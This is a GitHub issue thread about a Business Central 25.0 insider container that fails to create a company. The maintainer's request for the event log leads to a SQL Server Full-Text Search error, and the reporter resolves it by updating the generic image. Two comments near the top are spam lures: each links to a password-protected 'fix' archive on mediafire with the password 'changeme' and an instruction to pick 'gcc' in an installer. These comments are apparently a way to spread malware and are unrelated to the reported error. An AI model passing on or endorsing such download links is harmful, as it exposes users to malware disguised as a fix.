### ISSUE TITLE
Insider Next major 25.0: unable to create company

### ISSUE THREAD

**Issue by xM1k3x** [microsoft/navcontainerhelper#3622]
We have created a docker container retreiving the image of Business Central 25.0 from the insider (country: IT). 
When we try to create a new company the procedure fails, without showing an error:

![image](https://github.com/user-attachments/assets/3861d483-d2c0-48ef-afb9-ad8079a28be9)

![image](https://github.com/user-attachments/assets/7f968333-5886-4211-9cad-acff6784cde0)

Activating the debugger, we have seen that the system fails on the insert step of the standard company table:

![image](https://github.com/user-attachments/assets/8371185a-f29e-436d-94f5-c417fd543f53)

The enviroment is a standard cronus with default license (no third app are installed)

Scripts used to create container and cause the issue:

$artifactUrl = Get-BCArtifactUrl -country it -select NextMajor -accept_insiderEula
$containerName = "TEST250"
New-BCContainer -accept_insiderEula -accept_eula -containerName $containerName –artifactUrl $artifactUrl -updateHosts -auth UserPassword -assignPremiumPlan 

BcContainerHelper version 6.0.20 (Latest version)
Docker Desktop 4.33.1 (latest version) – I’m using Windows container
Container Total Physical Memory is 31.7Gb 
Container Free Physical Memory is 13.4Gb
The system it’s updated

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by freddydk** [comment]
Anything in the event log?

**Comment by xM1k3x** [comment]
This is the last error from event log:

PS C:\run> Get-EventLog Application -EntryType Error -Newest 1 | % {$_.Message}
Error accessing Website BC
Type: Microsoft.Dynamics.Nav.Types.Exceptions.NavFullTextException
ErrorCode: -1
ShouldCalculateALCallStack: True
SuppressMessage: False
ContainsPersonalOrRestrictedInformation: False
DiagnosticsSuppress: True
MessageWithoutPrivateInformation:
  Text optimized index cannot be created/queried because the SQL Server Full-Text Search component is not installed.

      Please install the SQL Server Full-Text Search component and try again.
SuppressExceptionCreatedEvent: False
FatalityScope: None
ErrorLevel: Error
ALCallStack:
  "Assisted Company Setup"(CodeUnit 1800).CreateNewCompany line 11 - Base Application by Microsoft
  "Company Creation Wizard"(Page 9192).FinishAction line 5 - Base Application by Microsoft
  "Company Creation Wizard"(Page 9192)."ActionFinish - OnAction"(Trigger) line 2 - Base Application by Microsoft

Message:
  Text optimized index cannot be created/queried because the SQL Server Full-Text Search component is not installed.

      Please install the SQL Server Full-Text Search component and try again.
Source: Microsoft.Dynamics.Nav.Client.ServiceConnection
HResult: -2146233088
StackTrace:
     at Microsoft.Dynamics.Nav.Client.ConnectionStateManager.CallServer[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ConnectionStateManager.cs:line 54
     at Microsoft.Dynamics.Nav.Client.ServiceConnection.CallServer[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ServiceConnection.cs:line 0
     at Microsoft.Dynamics.Nav.Client.ServerInvocationHandler.CallServerSync[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ServerInvocationHandler.cs:line 99
     at Microsoft.Dynamics.Nav.Client.ServiceConnectionBase.ActionField(NavRecordState& state, NavDataSet recDataSet, Int32 controlId, Int32 controlEventId, Object[] args) in s:\repo\src\Platform\ClientServerShared\Prod.Types\ServiceConnection\ServiceConnectionBase.cs:line 623
     at Microsoft.Dynamics.Nav.Client.ServiceConnection.Microsoft.Dynamics.Nav.Client.IService.ActionField(NavRecordState& state, NavDataSet recDataSet, Int32 controlId, Int32 controlEventId, Object[] args)
     at Microsoft.Dynamics.Nav.Client.DataBinder.NstDataAccess.ActionMethod(Int32 controlId, Int32 controlEventId, Object[] args) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Databinder\NSTDataAccess.cs:line 786
     at Microsoft.Dynamics.Nav.Client.Actions.InvokePageTriggerAction.InvokeTrigger(LogicalControl logicalControl, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Actions\FormActions\InvokePageTriggerAction.cs:line 115
     at Microsoft.Dynamics.Nav.Client.Actions.InvokePageTriggerAction.InvokeCore(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Actions\FormActions\InvokePageTriggerAction.cs:line 76
     at Microsoft.Dynamics.Framework.UI.LogicalAction.DoInvokeCore(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.ClientFwk\Actions\LogicalAction.cs:line 583
     at Microsoft.Dynamics.Framework.UI.LogicalAction.InvokeCoreWithErrorHandling(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.ClientFwk\Actions\LogicalAction.cs:line 562
StackTrace:
     at Microsoft.Dynamics.Nav.Client.ConnectionStateManager.CallServer[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ConnectionStateManager.cs:line 54
     at Microsoft.Dynamics.Nav.Client.ServiceConnection.CallServer[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ServiceConnection.cs:line 0
     at Microsoft.Dynamics.Nav.Client.ServerInvocationHandler.CallServerSync[T](Func`1 callServer, Nullable`1 options) in s:\repo\src\Platform\Client\Shared\Prod.Client.ServiceConnection\ServerInvocationHandler.cs:line 99
     at Microsoft.Dynamics.Nav.Client.ServiceConnectionBase.ActionField(NavRecordState& state, NavDataSet recDataSet, Int32 controlId, Int32 controlEventId, Object[] args) in s:\repo\src\Platform\ClientServerShared\Prod.Types\ServiceConnection\ServiceConnectionBase.cs:line 623
     at Microsoft.Dynamics.Nav.Client.ServiceConnection.Microsoft.Dynamics.Nav.Client.IService.ActionField(NavRecordState& state, NavDataSet recDataSet, Int32 controlId, Int32 controlEventId, Object[] args)
     at Microsoft.Dynamics.Nav.Client.DataBinder.NstDataAccess.ActionMethod(Int32 controlId, Int32 controlEventId, Object[] args) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Databinder\NSTDataAccess.cs:line 786
     at Microsoft.Dynamics.Nav.Client.Actions.InvokePageTriggerAction.InvokeTrigger(LogicalControl logicalControl, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Actions\FormActions\InvokePageTriggerAction.cs:line 115
     at Microsoft.Dynamics.Nav.Client.Actions.InvokePageTriggerAction.InvokeCore(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.Client.UI\Actions\FormActions\InvokePageTriggerAction.cs:line 76
     at Microsoft.Dynamics.Framework.UI.LogicalAction.DoInvokeCore(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.ClientFwk\Actions\LogicalAction.cs:line 583
     at Microsoft.Dynamics.Framework.UI.LogicalAction.InvokeCoreWithErrorHandling(LogicalControl logicalControl, Object state, UISession uiSession) in s:\repo\src\Platform\Client\Shared\Prod.ClientFwk\Actions\LogicalAction.cs:line 562
----------------------------------
Type: Microsoft.Dynamics.Nav.Types.Exceptions.NavFullTextException
ErrorCode: -1
ShouldCalculateALCallStack: True
SuppressMessage: False
ContainsPersonalOrRestrictedInformation: False
DiagnosticsSuppress: True
MessageWithoutPrivateInformation:
  Text optimized index cannot be created/queried because the SQL Server Full-Text Search component is not installed.

      Please install the SQL Server Full-Text Search component and try again.
SuppressExceptionCreatedEvent: False
FatalityScope: None
ErrorLevel: Error
ALCallStack:
  "Assisted Company Setup"(CodeUnit 1800).CreateNewCompany line 11 - Base Application by Microsoft
  "Company Creation Wizard"(Page 9192).FinishAction line 5 - Base Application by Microsoft
  "Company Creation Wizard"(Page 9192)."ActionFinish - OnAction"(Trigger) line 2 - Base Application by Microsoft

Message:
  Text optimized index cannot be created/queried because the SQL Server Full-Text Search component is not installed.

      Please install the SQL Server Full-Text Search component and try again.
Source: Microsoft.Dynamics.Nav.Ncl
HResult: -2146233088
StackTrace:
     at Microsoft.Dynamics.Nav.Runtime.Sql.FullText.PendingFullTextChanges.AppendOrUpdate(NavDatabase database, IReadOnlyList`1 changes)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlBatchedCommand.ExecuteNonQueryAsync()
     at System.Threading.Tasks.ValueTask`1.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDdlCommands.CreateNonSiftIndexes(NCLMetaTable table, Int32 companyToken, NavAppTableContext tableContext, TablePartitionMetadata tablePartitionMetadata, Boolean useOffline)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDdlCommands.CreateTableInCompany(NavDatabase database, NCLMetaTable table, Int32 companyToken, NavAppTableContext tableContext, TablePartitionMetadata tablePartitionMetadata)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.<>c__DisplayClass28_0.<CreateAllTablesInCompany>b__0(NavSqlConnectionScope conScope, NCLMetaTable table, NavAppTableContext tableContext)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.PerformCompanyWideAction(String errorMessageOnPendingSync, String operation, Action`3 actionToPerform, Action endAction, ITraceScopePartnerDiagnosticsLogger partnerDiagnosticsLogger)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.CreateAllTablesInCompany(NavSession session, Int32 companyToken)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.OnAfterInsertCompany(MutableRecordBuffer recordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.<>c__DisplayClass21_0.<OnAfterInsertAsync>b__0(SystemTableTriggers _)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.OnAfterInsertAsync(MutableRecordBuffer recordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.TransactionalDataCache.<>c__DisplayClass31_0.<CreateOnAfterInsertFunction>b__0(ReadOnlyRecordBuffer outputRecordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.DataAccess.InsertAsync(Int32 companyToken, MutableRecordBuffer recordBuffer, InsertOptions options)
     at Microsoft.Dynamics.Nav.Runtime.RecordImplementation.InsertRecordAsync(DataError errorLevel)
     at Microsoft.Dynamics.Nav.Runtime.NavRecord.InsertAsync(DataError errorLevel, Boolean runApplicationTrigger, Boolean runGlobalTrigger, Boolean insertWithSystemId)
     at Microsoft.Dynamics.Nav.Runtime.NavRecord.ALInsertAsync(DataError errorLevel, Boolean runApplicationTrigger, Boolean insertWithSystemId)
     at Microsoft.Dynamics.Nav.BusinessApplication.Codeunit1800.CreateNewCompany_Scope_1134722289.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at System.Threading.Tasks.ValueTask.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.BusinessApplication.Page9192.FinishAction_Scope_1160305374.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.BusinessApplication.Page9192.ActionFinish_a45_OnAction_Scope.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Runtime.NavApplicationMethod.InvokeMethodAsync(NavApplicationObjectBase applicationObject, String methodName, Object[] args, Boolean resolveHandler, Boolean throwOnNotFound)
     at Microsoft.Dynamics.Nav.Runtime.NavForm.RaiseOnActionAsync(Nullable`1 actionId, String actionTriggerMethodName, Object[] args)
     at Microsoft.Dynamics.Nav.Service.NSField.<>c__DisplayClass21_0.<<ActionFieldAsync>b__0>d.MoveNext()
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Service.NsFormDataAccess.RunWithFormDataAccessAsync[T](ITreeObject parent, NavForm form, Func`2 func)
     at Microsoft.Dynamics.Nav.Service.NsDataAccess.RunWithDataAccessAsync[T](ITreeObject parent, NavRecordState state, Boolean instantiateNewForm, Guid parentFormHandle, String parentControlName, Func`2 func)
     at System.Threading.Tasks.ValueTask`1.GetTaskForValueTaskSource(IValueTaskSource`1 t)
  --- End of stack trace from previous location ---
     at System.Threading.Tasks.ValueTask`1.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Service.AspNetCore.ClientService.ServiceOperationPipelineHelper.CallWithHandlingTargetInvocationException[T](Func`1 asyncFunc)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.StartSamplingProfilingCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.AddSessionToThreadSchedulerCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.RunInTransactionCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.TransientErrorRetryCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.ErrorMappingCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation, Boolean useCoreWcfFaultException)
StackTrace:
     at Microsoft.Dynamics.Nav.Runtime.Sql.FullText.PendingFullTextChanges.AppendOrUpdate(NavDatabase database, IReadOnlyList`1 changes)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlBatchedCommand.ExecuteNonQueryAsync()
     at System.Threading.Tasks.ValueTask`1.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDdlCommands.CreateNonSiftIndexes(NCLMetaTable table, Int32 companyToken, NavAppTableContext tableContext, TablePartitionMetadata tablePartitionMetadata, Boolean useOffline)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDdlCommands.CreateTableInCompany(NavDatabase database, NCLMetaTable table, Int32 companyToken, NavAppTableContext tableContext, TablePartitionMetadata tablePartitionMetadata)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.<>c__DisplayClass28_0.<CreateAllTablesInCompany>b__0(NavSqlConnectionScope conScope, NCLMetaTable table, NavAppTableContext tableContext)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.PerformCompanyWideAction(String errorMessageOnPendingSync, String operation, Action`3 actionToPerform, Action endAction, ITraceScopePartnerDiagnosticsLogger partnerDiagnosticsLogger)
     at Microsoft.Dynamics.Nav.Runtime.NavSqlDatabaseSync.CreateAllTablesInCompany(NavSession session, Int32 companyToken)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.OnAfterInsertCompany(MutableRecordBuffer recordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.<>c__DisplayClass21_0.<OnAfterInsertAsync>b__0(SystemTableTriggers _)
     at Microsoft.Dynamics.Nav.Runtime.SystemTableTriggers.OnAfterInsertAsync(MutableRecordBuffer recordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.TransactionalDataCache.<>c__DisplayClass31_0.<CreateOnAfterInsertFunction>b__0(ReadOnlyRecordBuffer outputRecordBuffer)
     at Microsoft.Dynamics.Nav.Runtime.DataAccess.InsertAsync(Int32 companyToken, MutableRecordBuffer recordBuffer, InsertOptions options)
     at Microsoft.Dynamics.Nav.Runtime.RecordImplementation.InsertRecordAsync(DataError errorLevel)
     at Microsoft.Dynamics.Nav.Runtime.NavRecord.InsertAsync(DataError errorLevel, Boolean runApplicationTrigger, Boolean runGlobalTrigger, Boolean insertWithSystemId)
     at Microsoft.Dynamics.Nav.Runtime.NavRecord.ALInsertAsync(DataError errorLevel, Boolean runApplicationTrigger, Boolean insertWithSystemId)
     at Microsoft.Dynamics.Nav.BusinessApplication.Codeunit1800.CreateNewCompany_Scope_1134722289.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at System.Threading.Tasks.ValueTask.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.BusinessApplication.Page9192.FinishAction_Scope_1160305374.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.BusinessApplication.Page9192.ActionFinish_a45_OnAction_Scope.OnRunAsync()
     at System.Threading.Tasks.ValueTask.GetTaskForValueTaskSource(IValueTaskSource t)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Runtime.NavApplicationMethod.InvokeMethodAsync(NavApplicationObjectBase applicationObject, String methodName, Object[] args, Boolean resolveHandler, Boolean throwOnNotFound)
     at Microsoft.Dynamics.Nav.Runtime.NavForm.RaiseOnActionAsync(Nullable`1 actionId, String actionTriggerMethodName, Object[] args)
     at Microsoft.Dynamics.Nav.Service.NSField.<>c__DisplayClass21_0.<<ActionFieldAsync>b__0>d.MoveNext()
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Service.NsFormDataAccess.RunWithFormDataAccessAsync[T](ITreeObject parent, NavForm form, Func`2 func)
     at Microsoft.Dynamics.Nav.Service.NsDataAccess.RunWithDataAccessAsync[T](ITreeObject parent, NavRecordState state, Boolean instantiateNewForm, Guid parentFormHandle, String parentControlName, Func`2 func)
     at System.Threading.Tasks.ValueTask`1.GetTaskForValueTaskSource(IValueTaskSource`1 t)
  --- End of stack trace from previous location ---
     at System.Threading.Tasks.ValueTask`1.ValueTaskSourceAsTask.<>c.<.cctor>b__4_0(Object state)
  --- End of stack trace from previous location ---
     at Microsoft.Dynamics.Nav.Service.AspNetCore.ClientService.ServiceOperationPipelineHelper.CallWithHandlingTargetInvocationException[T](Func`1 asyncFunc)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.StartSamplingProfilingCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.AddSessionToThreadSchedulerCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.RunInTransactionCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.TransientErrorRetryCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation)
     at Microsoft.Dynamics.Nav.Service.ServiceOperationPipeline.ErrorMappingCombinator[T](ServiceOperationContext context, ServiceOperation`1 innerOperation, Boolean useCoreWcfFaultException)

**Comment by freddydk** [comment]
Did you make this work?
If not, could you share the full output of the container generation formatted as code (append a line with \`\`\` in front of and after the output)

**Comment by xM1k3x** [comment]
Hi freddy,
sorry for the delay.

We have update the generic image and the issue goes away, the new company has been successfully created.

Thx a lot!
